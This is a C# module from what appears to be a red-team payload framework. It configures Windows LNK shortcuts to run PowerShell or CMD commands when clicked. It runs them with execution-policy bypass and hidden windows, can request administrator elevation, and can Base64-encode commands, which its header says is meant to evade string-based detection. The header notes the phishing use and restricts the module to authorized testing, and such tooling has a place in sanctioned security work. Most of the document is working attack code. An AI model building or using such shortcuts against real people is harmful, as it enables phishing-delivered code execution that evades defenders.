/*
 * MODULE: LNK Command Executor
 * ID: lnk-command-executor
 * DESCRIPTION: Creates LNK shortcuts that execute system commands via PowerShell or CMD
 * CATEGORY: LNK Actions
 * SUPPORTED_EXECUTION_TYPES: lnk-shortcut
 *
 * PARAMETERS:
 * @Command|string|whoami|||placeholder=whoami,required|Command to execute
 * @CommandType|choice|powershell|cmd:powershell||required|Type of command interpreter to use
 * @Arguments|string||||placeholder=-NoProfile -ExecutionPolicy Bypass,optional|Additional command arguments
 * @RunAsAdmin|bool|false||||Request elevation (run as administrator)
 * @Base64Encode|bool|false||||Base64 encode PowerShell command (obfuscation)
 *
 * USAGE:
 * This module configures LNK shortcuts to run system commands when clicked.
 * - PowerShell: Runs commands through PowerShell with full .NET access
 * - CMD: Runs commands through traditional Command Prompt
 * - Admin elevation: Can request UAC prompt for elevated privileges
 * - Base64 encoding: Obfuscates PowerShell commands using -EncodedCommand parameter
 *
 * EXAMPLES:
 * PowerShell: "Get-Process", "Invoke-WebRequest -Uri https://example.com"
 * CMD: "dir", "ipconfig /all", "netstat -ano"
 * Base64 (PowerShell only): Encodes command to bypass basic string-based detection
 *
 * SECURITY WARNING:
 * This module is designed for authorized security testing only.
 * LNK files with embedded commands can be used in phishing attacks.
 */

// USINGS
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;

// CODE
Console.WriteLine("[*] LNK Command Executor Module");
Console.WriteLine($"[*] Command: {@Command}");
Console.WriteLine($"[*] Command Type: {@CommandType}");
Console.WriteLine($"[*] Arguments: {@Arguments}");
Console.WriteLine($"[*] Run As Admin: {@RunAsAdmin}");
Console.WriteLine($"[*] Base64 Encode: {@Base64Encode}");

try
{
    var command = @Command;
    var commandType = @CommandType.ToLower();
    var arguments = @Arguments;
    var runAsAdmin = @RunAsAdmin;
    var base64Encode = @Base64Encode;

    // Build the full command string
    var fullCommand = string.IsNullOrEmpty(arguments)
        ? command
        : $"{command} {arguments}";

    Console.WriteLine($"[*] Full command: {fullCommand}");

    // Create process start info based on command type
    ProcessStartInfo psi;
    if (commandType == "powershell")
    {
        string psArgs;

        // Apply Base64 encoding if requested
        if (base64Encode)
        {
            // Convert PowerShell command to Base64
            var bytes = System.Text.Encoding.Unicode.GetBytes(fullCommand);
            var base64Command = Convert.ToBase64String(bytes);

            Console.WriteLine($"[*] Base64 encoded command length: {base64Command.Length} characters");

            // Use -EncodedCommand parameter (PowerShell will decode and execute)
            psArgs = $"-ExecutionPolicy Bypass -NoProfile -EncodedCommand {base64Command}";
        }
        else
        {
            // Use regular -Command parameter
            psArgs = $"-ExecutionPolicy Bypass -NoProfile -Command \"{fullCommand}\"";
        }

        psi = new ProcessStartInfo
        {
            FileName = "powershell.exe",
            Arguments = psArgs,
            UseShellExecute = runAsAdmin,
            CreateNoWindow = !runAsAdmin,
            WindowStyle = runAsAdmin ? ProcessWindowStyle.Normal : ProcessWindowStyle.Hidden
        };
    }
    else // cmd
    {
        psi = new ProcessStartInfo
        {
            FileName = "cmd.exe",
            Arguments = $"/c {fullCommand}",
            UseShellExecute = runAsAdmin,
            CreateNoWindow = !runAsAdmin,
            WindowStyle = runAsAdmin ? ProcessWindowStyle.Normal : ProcessWindowStyle.Hidden
        };
    }

    // Set verb to "runas" if admin elevation is requested
    if (runAsAdmin)
    {
        psi.Verb = "runas";
    }

    // Redirect output if not running as admin
    if (!runAsAdmin)
    {
        psi.RedirectStandardOutput = true;
        psi.RedirectStandardError = true;
    }

    Console.WriteLine("[*] Starting process...");
    var process = Process.Start(psi);

    if (process != null)
    {
        if (!runAsAdmin)
        {
            // Read output for non-admin processes
            var output = process.StandardOutput.ReadToEnd();
            var error = process.StandardError.ReadToEnd();

            process.WaitForExit();

            if (!string.IsNullOrEmpty(output))
            {
                Console.WriteLine("[*] Command output:");
                Console.WriteLine(output);
            }

            if (!string.IsNullOrEmpty(error))
            {
                Console.WriteLine("[!] Command errors:");
                Console.WriteLine(error);
            }

            Console.WriteLine($"[*] Process exited with code: {process.ExitCode}");
        }
        else
        {
            Console.WriteLine("[*] Admin process started (running elevated)");
            // Don't wait for admin processes as they run in a separate elevated context
        }

        Console.WriteLine("[+] Command executed successfully");
    }
    else
    {
        Console.WriteLine("[-] Failed to start process");
    }
}
catch (System.ComponentModel.Win32Exception ex)
{
    // This typically happens when user cancels UAC prompt
    if (ex.NativeErrorCode == 1223) // ERROR_CANCELLED
    {
        Console.WriteLine("[!] User cancelled elevation request");
    }
    else
    {
        Console.WriteLine($"[-] Win32 error executing command: {ex.Message} (Code: {ex.NativeErrorCode})");
    }
}
catch (Exception ex)
{
    Console.WriteLine($"[-] Error executing command: {ex.Message}");
}
